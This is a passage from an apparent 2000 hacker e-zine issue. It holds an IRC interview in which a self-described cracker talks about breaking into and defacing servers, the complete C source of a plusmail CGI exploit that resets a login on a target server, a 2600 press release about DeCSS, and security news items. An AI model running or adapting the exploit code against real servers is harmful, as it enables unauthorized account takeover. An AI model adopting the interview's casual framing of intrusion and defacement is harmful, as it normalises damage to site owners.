separate problems when they originally surfaced. The company is working
on a more comprehensive patch to be released next week.

In the meantime, users should open their signature file to check if any
new text or code has been inserted, the WebTV representative said.

@HWA



06.0 BlaznWeed interview, background info, and Sect0r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Cruciphux

BlaznWeed contacted me regarding commenting on some of the things Sect0r said
in the interview last issue, so we address those and get a general interview
as well... mildly edited to remove general chatter. - Ed



Interview date: Sun Mar 19/2000
By: Cruciphux

Session Start: Sun Mar 19 15:26:53 2000
[15:26] Session Ident: BlaznWeed (some1@*.*.*.uk)
[15:26] <BlaznWeed> i'm ready
[15:27] <Cruciphux> ok hi.. sorry to keep ya waiting
[15:27] <BlaznWeed> np
[15:27] <Cruciphux> i'm pretty informal, no real structure
[15:28] <BlaznWeed> thats fine by me
[15:28] <Cruciphux> i'll do the preliminary intro questions ...
[15:28] <Cruciphux> like age interest group affiliations etc
[15:28] <BlaznWeed> i'm 20 and my group is wkD
[15:29] <Cruciphux> whats wkD stand for?
[15:29] <Cruciphux> and how long has it been around?
[15:29] <BlaznWeed> wicked
[15:29] <Cruciphux> how many members and where are they based?
[15:29] <Cruciphux> how did you meet? irc?
[15:29] <Cruciphux> :
[15:29] <BlaznWeed> there are many members
[15:30] <BlaznWeed> and i don't know them all
[15:30] <Cruciphux> some in other groups too?
[15:30] <BlaznWeed> I got introduced to wkD by zeroc
[15:30] <BlaznWeed> who is the founder
[15:30] <BlaznWeed> I don't think so
[15:30] <BlaznWeed> but i can't say for sure
[15:30] <BlaznWeed> he hangs on dalnet mostly
[15:31] <Cruciphux> you too?
[15:31] <BlaznWeed> yeah
[15:31] <Cruciphux> why dalnet? any reason?
[15:31] <BlaznWeed> Most of my freinds are on dalnet
[15:31] <Cruciphux> how long have you been on the net?
[15:32] <BlaznWeed> about three four years
[15:32] <BlaznWeed> to
[15:32] <Cruciphux> how long have you been into computers? same time or
longer?
[15:32] <BlaznWeed> the nets is relatively new here in the uk
[15:32] <BlaznWeed> longer
[15:32] <BlaznWeed> about six maybe 7
[15:33] <Cruciphux> how would you classify yourself? ie: hacker cracker
coder scriptkid <sic>
[15:33] <Cruciphux> and do you code? if so in what?
[15:33] <BlaznWeed> hehe
[15:33] <BlaznWeed> yes i do code
[15:34] <BlaznWeed> but i haven't written my own exploits yet
[15:34] <Cruciphux> oh I forgot 'defacer'
[15:34] <Cruciphux> :)
[15:34] <BlaznWeed> i'm a full time computer science student
[15:34] <BlaznWeed> i suppose i'd be labeled a cracker
[15:34] <Cruciphux> so you break into sites but don't deface all of them?
[15:35] <BlaznWeed> If i manage to break into a unix box i don't defeace
them
[15:35] <Cruciphux> about how many have you done?
[15:35] <BlaznWeed> simply because i have other uses for them
[15:35] <Cruciphux> and how long have you been doing it?
[15:35] <BlaznWeed> but the N boxes i have no use for
[15:35] <Cruciphux> nod
[15:36] <BlaznWeed> maybe a couple of years now
[15:36] <BlaznWeed> i started of hacking nothing but unix boxes
[15:36] <Cruciphux> what is your home machine? if more than one box whats
your setup?
[15:36] <BlaznWeed> I actually enjoy playing hide a nd seek with admins
[15:36] <Cruciphux> heh
[15:36] <Cruciphux> battle of wits
[15:37] <BlaznWeed> I'm just running linux at home
[15:37] <BlaznWeed> but i used to eun solaris
[15:37] <BlaznWeed> but the thing with solaris is that it doesn't run very
well on x86 proccesssors
[15:38] <BlaznWeed> so i'm stuck with linux until i can afford a sparc
[15:38] <Cruciphux> I don't like solaris
[15:38] <BlaznWeed> solaris and linux are like blondes and brunettes i like
em both
[15:38] <BlaznWeed> :D
[15:38] <Cruciphux> and its worse on x86 processors
[15:39] <Cruciphux> what about *BSD?
[15:39] <Cruciphux> its closer to real unix than linux*
[15:39] <BlaznWeed> I haven't tried that
[15:39] <BlaznWeed> though i do have a couple of bsd shells
[15:39] <BlaznWeed> legit ones mind
[15:40] <Cruciphux> without giving details outline a typical hack, ie: what
do you use as a base point, do you use pbx or redirectors
to dial into hacked accts etc, what country do you use etc
[15:40] <BlaznWeed> yeah i notice
[15:41] <BlaznWeed> no comment
[15:41] <Cruciphux> hehe
[15:41] <Cruciphux> damn that was the most interesting too
[15:41] <Cruciphux> :)
[15:41] <BlaznWeed> :)
[15:43] <BlaznWeed> well i suppose this interview gives me the perfect
opportunity to address some of the misleading comments
written by secto0r in the last issue of hwa
[15:43] <Cruciphux> I was about to approach that
[15:43] <Cruciphux> initially sect0r said he and you were 'ok' after the
defacement log incident
[15:44] <BlaznWeed> yeah i thought we were ok too
[15:44] <BlaznWeed> "He" claims i'm a wannabe with no skills,
[15:44] <BlaznWeed> this is funny since it was only the other day he asked me
[15:44] <BlaznWeed> to deface a web site for him
[15:45] <Cruciphux> hrm
[15:45] <BlaznWeed> "He" claims he could have redefaced my stuff easily
[15:45] <BlaznWeed> this is funny again since he had to come and ask me to do
his chores.
[15:45] <Cruciphux> yeah in the interview he said
[15:45] <Cruciphux> [20:03] <sect> i had someone akicked from #hackers on dalnet,
[15:45] <Cruciphux> the kid retaliated, what can i say?
[15:45] <BlaznWeed> And even if he did know how to redeface my stuff he wouldn't
have gotten
[15:45] <BlaznWeed> very far since I patched all the box's I hacked.
[15:45] <Cruciphux> [20:04] <sect> that would be blazinweed, he is basically a
[15:45] <Cruciphux> wannabe with no skills to speak of.
[15:45] <Cruciphux> [20:04] <sect> i would have re-defaced his stuff easily
[15:45] <Cruciphux> (nt boxen), but i'm not down with that
anymore.
[15:45] <Cruciphux> ...
[15:45] <BlaznWeed> He also highlights the fact
[15:45] <BlaznWeed> that they were only NT boxes that were defaced well
i'd like to respond to this by saying i only deface
NT boxes because i have no use for them but the unix
boxes I keep btw he runs windows :D
[15:45] <Cruciphux> good point
[15:46] <BlaznWeed> I'd also like to say a few things about the plusmail
exploit
[15:46] <BlaznWeed> that he and ytcracker talked about. I've never heard
so much bull ever.
[15:46] <BlaznWeed> the Hole was found by Herf (of wkD which is my group
also)
[15:46] <Cruciphux> but people take notice of defacements because they
are 'public' and summarily judge people in the 'scene'
by their web 'hacks'
[15:46] <BlaznWeed> and all it required was a simple html file that you
loaded in your browser
[15:46] <BlaznWeed> which then allowed you to bypass the login screeen on
dumb servers running plusmail.btw the scanner was
written by ytcracker and it was useless anyway since
next to no servers run the vulnerable package and the
ones that do have long since patched it.
[15:47] <BlaznWeed> This is the reason you didn't see it get a slot at
securityfocus.
[15:47] <Cruciphux> * plusmail cgi exploit
[15:47] <Cruciphux> - missnglnk
[15:47] <Cruciphux> greets: herf, ytcracker, mosthated, tino
[15:47] <Cruciphux> that one? or a variant
[15:47] <BlaznWeed> variant
[15:47] <Cruciphux> ok
[15:47] <Cruciphux> thats on packetstorm btw
[15:47] <BlaznWeed> I was one of the first people to have it
[15:48] <Cruciphux> http://packetstorm.securify.com/0001-exploits/plusmail.c
[15:48] <BlaznWeed> hrm
[15:49] <Cruciphux> have you confronted sect0r about his comments?
[15:49] <Cruciphux> if so what happened
[15:49] <Cruciphux> if not why not
[15:49] <Cruciphux> :)
[15:49] <BlaznWeed> he left before i could
[15:50] <BlaznWeed> someone found all his personel info
[15:50] <Cruciphux> nod I'm aware of that
[15:50] <BlaznWeed> and he is gone to hide
[15:52] <Cruciphux> anything else you'd like to say? there isn't that much we
haven't covered really
[15:53] <Cruciphux> we don't need to drag it out
[15:53] <Cruciphux> :)
[15:53] <BlaznWeed> :D
[15:53] <BlaznWeed> I think i've readdressed the balance
[15:53] <Cruciphux> do you guys have a site for instance?
[15:53] <Cruciphux> website that is
[15:53] <BlaznWeed> yeah but its private
[15:54] <Cruciphux> if you think of anything to add lemme know
[15:54] <BlaznWeed> ok
[15:54] <Cruciphux> my email is cruciphux@dok.org
[15:54] <BlaznWeed> thanks
[15:54] <Cruciphux> if i'm not online
[15:54] <Cruciphux> tnx
[15:54] <Cruciphux> -end-
Session Close: Sun Mar 19 15:55:19 2000

@HWA


07.0 plusmail cgi exploit
~~~~~~~~~~~~~~~~~~~~
/*
* plusmail cgi exploit
- missnglnk
greets: herf, ytcracker, mosthated, tino
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

extern int errno;

int
main(int argc, char **argv)
{
int argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040;
char *target, tmpdata[32768], *password = "default",
*username = "jackdidntsetone", pdata[1024], *errcode,
*tmpline, *firstline, clntfd, origdata[32768], htmldata[32768];
struct sockaddr_in rmt, srv, clt;
struct hostent *he;
unsigned long ip;

if (argc < 5) {
printf("plusmail cgi exploit by missnglnk\n");
printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
return -1;
}

while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
switch (argswitch) {
case 'h':
if (strlen(optarg) > MAXHOSTNAMELEN) {
printf("ERROR: Target hostname too long.\n");
return -1;
}
target = optarg;
break;

case 'p':
tport = atoi(optarg);
break;

case 'n':
if (strlen(optarg) > 8) {
printf("Password length greater than 8 characters.\n");
return -1;
}
password = optarg;
break;

case 'u':
if (strlen(optarg) > 8) {
printf("Username length greater than 8 characters.\n");
return -1;
}
username = optarg;
break;

case 'l':
lport = atoi(optarg);
break;

case '?':
default:
printf("plusmail cgi exploit by missnglnk\n");
printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]);
return -1;
break;
}
}

argc -= optind;
argv += optind;

bzero(&rmt, sizeof(rmt));
bzero(&srv, sizeof(srv));
bzero(&clt, sizeof(clt));
bzero(tmpdata, sizeof(tmpdata));
cltlen = sizeof(clt);

if ((he = gethostbyname(target)) != NULL) {
ip = *(unsigned long *) he->h_addr;
} else if ((ip = inet_addr(target)) == NULL) {
perror("Error resolving target");
return -1;
}

rmt.sin_family = AF_INET;
rmt.sin_addr.s_addr = ip;
rmt.sin_port = htons(tport);

srv.sin_family = AF_INET;
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons(lport);

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("Error creating socket");
return -1;
}

if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) {
perror("Error connecting");
return -1;
}

snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password, password);
plen = strlen(pdata);

snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \
"Referer: http://www.pure-security.net\n" \
"User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \
"Host: %s\n" \
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \
"Accept-Encoding: gzip\n" \
"Accept-Language: en\n" \
"Accept-Charset: isp-8859-1,*,utf-8\n" \
"Content-type: application/x-www-form-urlencoded\n" \
"Content-length: %d\n" \
"\n%s\n", target, plen, pdata);

if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) {
perror("Error writing data");
return -1;
}

bzero(tmpdata, sizeof(tmpdata));
while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) {
strncpy(origdata, tmpdata, sizeof(origdata));
firstline = strtok(tmpdata, "\n");
bzero(tmpdata, sizeof(tmpdata));

if ((errcode = strstr(firstline, "404")) != NULL) {
printf("plusmail.cgi aint here buddy.\n");
return -1;
}

for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) {
if ((errcode = strstr(tmpline, "<form action")) != NULL) {
// sprintf(htmldata, "%s<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", htmldata, target);
snprintf(htmldata, sizeof(htmldata), "%s<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", htmldata, target);
} else {
// sprintf(htmldata, "%s%s\n", htmldata, tmpline);
snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline);
}
}
}

if (close(sockfd) < 0) {
perror("Error closing socket");
return -1;
}

strncat(htmldata, "\n<br><missnglnk>\0", sizeof(htmldata));

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("Error creating socket");
return -1;
}

printf("waiting on port %d...", lport);

if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) {
perror("Error binding to socket");
return -1;
}

if (listen(sockfd, 0) < 0) {
perror("Error setting backlog");
return -1;
}

if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) {
perror("Error accepting connection");
return -1;
}

printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));

if (!write(clntfd, htmldata, sizeof(htmldata))) {
perror("Error writing data");
return -1;
}

if (close(clntfd) < 0) {
perror("Error closing socket");
return -1;
}

printf("\n%s\n", htmldata);
return 0;
}

@HWA

08.0 2600 activism against the MPAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.2600.com/
http://www.2600.com/news/2000/0130.html

February 2, 2000

FOR IMMEDIATE RELEASE

DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES

Members of the hacker and open source communities worldwide, along with
various civil liberties groups, are planning a massive leafletting
campaign on Friday, February 4 to call attention to the recent attempts
by the Motion Picture Association of America to shut down thousands of
websites.

Lawsuits have been filed against hundreds of people, as well as an Internet
Service Provider and a magazine, for having information the MPAA wants
to keep secret.

The controversy centers around a computer program known as DeCSS, thought to
be written by a 16 year old in Norway. The program defeats the encryption
scheme used by DVD's which prohibits them from being viewed on non-approved
machines or computers. It also enables DVD's from one country to be
played in another, contrary to the wishes of the movie industry. It does
NOT facilitate DVD piracy - in fact, copying DVD's has been possible
since their introduction years ago. In its press releases on the subject,
the MPAA has claimed that this is a piracy issue and they have subsequently
succeeded in getting injunctions against a number of sites that had
posted the program in the interests of free speech.

This is in effect a lawsuit against the entire Internet community by
extremely powerful corporate interests. The lawsuit and the various
actions being planned promise to be a real showdown between two increasingly
disparate sides in the technological age. The consequences of losing this
case are so serious that civil libertarians, professors, lawyers, and a
wide variety of others have already stepped forward to help out.

Friday's action will be coordinated in 74 cities throughout North America
and 26 cities in other parts of the world. Leafletting will take place
outside theaters and video stores in these cities - all of which
participate in a monthly "2600" gathering. 2600 Magazine has been named
in two lawsuits regarding the DeCSS program and has joined with the
the growing number of people who will fight these actions by the MPAA
until the end.

The lawsuit has been filed by the Motion Picture Association of America,
Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney
Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and
Time Warner Entertainment.

Contact:
Emmanuel Goldstein
(631) 751-2600 ext. 0

leaflet campaign:
~~~~~~~~~~~~~~~~~

CALL TO ACTION

01/30/00

Thousands of copies of the flyer have already
been distributed at movie theaters worldwide. Versions are also being made
in different languages. The next step will involve a massive action this
Friday, February 4, 2000.

We call on all 2600 meetings held around the world on that day to head to
the local theaters and spread the word of this travesty of justice by
handing out as many flyers as possible. Everyone is invited to show up and
participate, bring your friends, tell your local Linux User Group, spread
the news to any organization you're part of, and join us in advocating
justice. We find that once people are made aware of the facts of the case,
they become as outraged as we have.

TIPS FOR HANDING OUT FLYERS First, make sure you make the flyers
distinctive by printing on colored paper if at all possible. The quickest
way to do this is to go to a copy shop. Get several hundred at the very
least - you WILL go through them quickly. Make sure you can print more if
you need them.

Familiarize yourself with the facts of the case as presented on
www.opendvd.org. It's important to be able to answer questions of people
who are interested in learning more. Remember, this is NOT about DVD piracy
- that is how the movie industry is trying to portray this case. The issue
here is CONTROL of players - whether you have the right to play DVD's on
the computer of your choice and whether you should be able to see DVD's
from other countries. As well as our freedom to continue reporting on the
events, developments and discoveries of the hacker community, in a full and
accurate manner.

We find that people respond well to "Protect Your Rights" as a catch phrase
to get them to take the flyer. Let us know if others work for you. Be
courteous to the people passing by - don't block their path and, if they
ignore you or even make a snide remark, don't heckle them. We find that the
vast majority of people are polite and interested in what you have to say.
You'll find that some will even come up to you asking for more flyers! Have
a set of master copies (printed on white paper) for others to make copies
of their own and hand out in other places.

If you are asked to leave by theater management, cooperate and ask them
where they would like you to stand. They can't force you to leave the area,
only the part that is their property. You can still successfully hand out
material to everyone coming and going by positioning yourself in
neighboring areas or even in the parking lot. If things become unpleasant,
simply head to another theater in a different part of town. (If you run out
of theaters, you can always fall back on video stores.) We find that 90% of
such confrontations can be averted by befriending security guards and
making it clear that you don't intend to be disruptive.


@HWA

09.0 Microsoft sends magazine full versions of Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by TRDonJuan

(Translated from German by Babelfish)
http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html

Microsoft gave away inadvertently 100,000 Windows-2000-Kopien in the
value of approximately 33 million dollar to private users. How the
Spanish intelligence service Brujula.com reports, Microsoft wanted to
actually pack on 120 days the limited version of the operating system
on booklet DS, those approximately 100,000 outputs of the Spanish
PC WELT sister " PC World " supplements. Afterwards it turned out
however that it concerned at the software a temporally unlimited
version inclusive Registrations code.

Thus 100,000 installations of Windows are 2000 without license in
the circulation. And with a selling price of 330 dollar per copy
might have developed for Microsoft a financial damage of 33 million
dollar.

Who caused the error, is not certain officially. Insider assume
however not the magazine, but Microsoft is responsible for the
breakdown. Some whisper even, Microsoft

-=-


Win 2000 gratis auf CD

Microsoft hat versehentlich 100.000 Windows-2000-Kopien im Wert von
rund 33 Millionen Dollar an private Anwender verschenkt. Wie der
spanische Nachrichtendienst Brujula.com berichtet, wollte Microsoft
eigentlich die auf 120 Tage limitierte Version des Betriebssystems auf
Heft-CDs packen, die rund 100.000 Ausgaben der spanischen
PC-WELT-Schwester "PC World" beilagen. Im Nachhinein stellte sich
jedoch heraus, dass es sich bei der Software um eine zeitlich unbegrenzte
Version inklusive Registrations-Code handelte.

Damit sind 100.000 Installationen von Windows 2000 ohne Lizenz im
Umlauf. Und bei einem Verkaufspreis von 330 Dollar pro Kopie dürfte
Microsoft ein finanzieller Schaden von 33 Millionen Dollar entstanden sein.

Wer den Fehler verursacht hat, steht offiziell noch nicht fest. Insider gehen
jedoch davon aus, dass nicht die Zeitschrift, sondern Microsoft selbst für
die Panne verantwortlich ist. Manche munkeln sogar, Microsoft habe die
Vollversion absichtlich auf die CDs gepackt, um die Verkaufszahlen von
Windows 2000 in die Höhe zu treiben, und das Ganze anschließend als
Versehen deklariert. Denn aufgrund der Monopolstellung, die dem
Software-Riesen angekreidet wird, könne er das Betriebssystem nicht
offiziell verschenken.

Die Ausgabe der PC World Spanien, der die CD-ROM beilag, erzielte auf
jeden Fall einen Verkaufsrekord. (PC-WELT, 16.03.2000, sp)

@HWA

10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by William Knowles
According to Arthur L. Money, the chief information
officer of the US Defense Department, Mexican
Zapatista guerrillas managed to breach the online
security systems of some pentagon computers in 1998.
Money said that the intruders used systems from the
Frankfurt Stock Exchange to launch their attacks.

Agence France-Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html
(Sorry: 404 or expired story link)

@HWA

11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Online warez groups fighting amongst each other is now
considered guerrilla warfare by authorities in Brazil.
According to the daily O Globo the Brazilian Hacker
Organization (OHB) and the Anti-OHB have been trading
insults via web defacements for some time. The Sao
Paulo Civil Police Cybercrime Unit is also following
attacks by three other active organizations: Hatted
Copr, InfernBr and Crime Boys.

EFE via COMTEX - via Northern Light
http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc
(Pay to play document sorry ... - Ed)

@HWA

12.0 HNN:Mar 13th:French Bank Card Algorithm Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by alan.hop
Serge Humpich was sentenced to a ten month
suspended sentence after notifying the French bank,
Cartes Bancaires, that its bank cards where vulnerable
to fraud. Now the secret that Humpich discovered has
been released to the Internet. Bank officials say that
the potential for fraud or fake cards is small while
security experts fear that the underground will flood the
market with fake cards within weeks.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html

Friday March 10 3:07 PM ET

Card Alert for French Banks

By Catherine Bremer

PARIS (Reuters) - France braced for a wave of petty fraud after officials
admitted on Friday that a formula posted on the Internet showed how to
forge smart payment cards.

But Cartes Bancaires, the French interbank group whose card system is
affected, said there was no danger that bank accounts would be emptied.

Cards made with the formula might be used to buy train tickets or pay
parking meters or toll booths although there was no evidence this had
actually happened, Cartes Bancaires spokesman Herve de Lacotte told
Reuters.

``For the first time in 10 years, a lock has been sprung,'' he said. ``But
springing a lock will not necessarily open the door and let you in. There
is a theoretical risk of fraud but the problem concerns banks, not
consumers or shops.''

Despite claims to the contrary, Lacotte said, false cards made with the
code could not be used in cash dispensers, to make shop purchases or for
expensive goods.

Newspapers leaped on the story, quoting experts as saying the complex
96-digit code could be used to forge three in four of France's 34 million
bank cards.

Headlines like ``Chip card secret out'' left anyone with a bank card
wondering whether their money was safe.

``Consumers have been paying for bank cards that aren't even secure.
They've been cheated and lied to,'' said Eric April, Secretary-General of
the AFOC consumer group.

Lacotte said the scare stories were over the top and the Bank of France
accused the press of ``exaggerating the risk.''

``Even if certain clues relating to this algorithm have been made
public... other security measures exist enabling strong limits on the use
that can be made of this information,'' the French central bank said in a
statement.

Cards issued since last autumn had added security which meant the pirate
formula would not work for them, he added.

SCSSI, the government body in charge of information security systems,
urged banks to replace older cards with updated ones.

The card formula was posted anonymously on Internet chat site last
weekend. It was actually discovered three years ago by computer whizz kid
Serge Humpich, who denies using it or circulating but has been given a
10-month suspended prison sentence for cracking the banks' secret.

Now that it is public, Humpich says, pirates could buy a chip card kit for
around $370 and be turning out false cards within weeks.

``A few weeks from now dozens of false cards are going to appear,'' he
told Liberation.


@HWA

13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Investigators are still sifting through mountains of log
files but are having a rough time tracing the recent
denial of service attacks against online giants Yahoo,
ZD Net, CNN, and others. Officials still do not have any
suspects and hope that more traditional methods will
allow them to locate the culprit(s).

San Jose Mercury News
http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm

Posted at 8:28 p.m. PST Thursday, March 9, 2000

No suspects in cyberattacks

Investigators try to track down origin of last month's assaults

BY DAVID L. WILSON Mercury News Washington Bureau

WASHINGTON -- Federal authorities are continuing to investigate last
month's series of attacks on commercial Internet sites, but sources
close to the investigation say they have no suspects yet.

Investigators are sifting through mountains of data, trying to track the
attacks back to their origin using logs from the computers involved, but
they concede that building a case using such methods may be difficult, if
not impossible. Some believe that a break in case is more likely to come
from more traditional methods.

``Often what you see in a cold case is a lead coming from someone who is
in custody on an unrelated minor charge who offers information in return
for a get-out-of-jail-free card,'' said one person with ties to the
investigation. ``If somebody brags that he was behind this, eventually
somebody else will roll over on him.''

Often, however, the braggarts are blowing smoke. For instance, a
17-year-old who goes by the moniker ``Coolio'' hinted in online chats that
he was behind at least some of the attacks. But federal authorities
say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H.,
was involved. However, Wednesday Moran was charged with two counts of
unauthorized access to a computer system in connection with vandalism to
the Los Angeles Police Department Web site DARE.com.

In last month's attacks on popular Web sites such as Yahoo, eBay and CNN,
suspects used a specialized technique known as a distributed denial of
service attack. The technique depends on stealth software that has
been secretly installed on hundreds of computers connected to the
Internet. At a given signal, the programs attack a targeted Web site,
flooding it with so much data that normal business is impossible.

Investigators are using log files from the computers infected with the
stealth software, hoping to track the trail back to the individual who
installed the programs, but they have been unsuccessful so far.

The difficulties investigators face were summed up in a 60-page report the
federal government released Thursday. In a news conference discussing the
report, Attorney General Janet Reno said law enforcement faces a
number of challenges in cyberspace.

``These challenges include the inability to trace criminals who hide their
identities online, difficulty in finding criminals who might be located in
other jurisdictions, the need for better coordination among law
enforcement agencies, and the need for trained personnel at all levels of
law enforcement,'' Reno told reporters.

The report generally said that existing laws could deal with crimes in
cyberspace. In addition, while highlighting advantages criminals can gain
from anonymity on the Internet, the report stressed that anonymity
is both important and useful for average citizens. It suggested that any
proposed changes in the availability and use of anonymity must be
considered very carefully.

Despite the report's measured tone, some groups feared a loss of privacy
for individuals who could find their every movement in cyberspace trac

  
ked
if they couldn't maintain anonymity.

The American Civil Liberties Union blasted the report in a letter to Reno.
``An end to Internet anonymity would chill free expression in
cyberspace,'' the letter declared. ``However, the report treats the
anonymity of Internet users as a `thorny issue' rather than a
constitutional right.''

Administration officials said the report was merely a starting point for
an examination of security in cyberspace, and that the government was
fully committed to maintaining privacy for Internet users.


Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com

@HWA

14.0 HNN:Mar 13th:Japanese Pirates Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
In a report released on March 10th, the Associated
Computer Software Copyright Society (ACCS) disclosed
two recent cases of piracy involving Internet bulletin
boards. A Hokkaido University student living in Sapporo
was arrested for selling as many as 30 illegal copies of
Microsoft's Office 2000 Professional and other software.
He charged a total of 500,000 yen (US$4,693.51) for
the CDR copies. A 24-year-old worker living in Takasaki,
Gunma prefecture was also recently arrested for
advertising and selling illegal software via an Internet
bulletin board. He sold software to 20 people for
100,000 yen (US$938.70). He said that he began selling
pirated software after he purchased some in the same
way.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759


Pirated Software Sales Rampant on Internet Bulletin Board

March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent
to which Internet bulletin boards are being used in Japan to sell pirated
software.

The Associated Computer Software Copyright Society (ACCS) disclosed the
extent of the situation on March 10.

In just the last 10 days, two cases of copyright violation have been
brought to light by the Metropolitan Police Agency and the Aichi Prefecture
Police.

On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo
District Public Prosecutors Office regarding the activities of a
22-year-old Hokkaido University student living in Sapporo. The student was
using an electronic bulletin board to advertise the sale of pirated
software and was accepting orders via e-mail.

The items included Microsoft's Office 2000 Professional as well as other
office and game software copied to CD-R disks without the copyright
holders' permission.

Between February and October 1999, the student reportedly sold illegally
copied software to some 30 individuals nationwide for a total of about
500,000 yen. (106.53 yen = US$1)

The other incident, uncovered by the high-tech crime unit of the Aichi
Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma
prefecture. A report on the suspect was submitted to the Nagoya District
Public Prosecutors Office on March 1.

Like the Sapporo student, the suspect is accused of using a bulletin board
operated by a leading Internet service provider to advertise the sale of
pirated software and accept online orders. The accused is believed to have
sold the software to 20 people during the course of about one month,
generating some 100,000 yen in sales. He reportedly confessed that he began
selling pirated software after buying it in a similar manner himself.

(BizTech News Dept.)

@HWA

15.0 HNN:Mar 13th:Online Handles Impose Fear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Do the handles chosen by online hooligans chosen in an
attempt to impose fear? Matt Richtel of the NY Times
attempts to explore the meanings of some of the more
glamorous handles of the online world. (To bad he
completely misses the personal privacy angle. And what
about entertainers like Sting, Madonna, John Couger, or
Prince?)

NY Times
http://www.nytimes.com/library/review/031200hacker-handles-review.html
(Pay to play url... sorry -Ed)

@HWA

16.0 HNN:Mar 13th:Vendors Still Making Insecure Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
At a recent congressional panel examining the threat to
federal and private-sector computer networks cyber
security experts blamed software manufacturers for
failing to improve the security features of most
consumer software.(People in the underground have
been saying this for years.)

Reuters - via Excite
http://news.excite.com/news/r/000309/15/net-tech-hacker
(Server:We're sorry, but this story is not currently available - Ed)


@HWA

17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acoplayse
Roland Moreno, whose smart cards he invented have
slashed the fraud rate in France by 90 percent in 10
years, rejected claims that an algorithm posted on a
Web chat site last week could bypass the cards
safeguards. He is so confident of his product that he is
offering a million francs ($148,100) to anyone who could
prove that they could read a bank's confidential code
from the card. Moreno went on to claim that "chip cards
are an unpenetrable data system." (So unpenetrable
that Serge Humpich recently received a 10 month
suspended sentence for defeating the system.)

Reuters
http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221


From above url;

"Boston conventions threaten biotech food fight"...
<snip>


(Appears to be incorrectly linked .. not having much luck
following up articles this week :/ sorree .. - Ed)


@HWA

18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki
In the past two months the Motion Picture Association
of America has continued to harass and intimidate
Internet users all over the world. Letters have been
sent, threats have been levied, ISPs have crumbled,
people have been fired from their jobs and worse. The
